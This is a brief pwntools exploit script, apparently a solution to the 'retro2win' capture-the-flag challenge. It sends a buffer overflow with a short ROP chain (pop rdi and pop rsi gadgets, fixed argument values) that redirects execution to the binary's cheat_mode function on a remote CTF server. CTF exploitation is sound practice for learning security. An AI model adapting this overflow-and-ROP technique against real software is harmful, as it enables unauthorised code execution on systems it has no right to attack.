#!/usr/bin/python3

from pwn import *

context.binary = target = ELF("./retro2win", checksec=False)
# r = process()
r = remote("retro2win.ctf.intigriti.io", 1338)

# funcs
s = lambda a: r.sendlineafter(b":", a)

# gadgets
pop_rdi = 0x4009b3
pop_rsi_r15 = 0x4009b1

# leak
s(b"1337")
buf = b"A"*24
buf += p64(pop_rdi)
buf += p64(0x2323232323232323)
buf += p64(pop_rsi_r15)
buf += p64(0x4242424242424242)
buf += p64(0)
buf += p64(target.sym.cheat_mode)
s(buf)

r.interactive()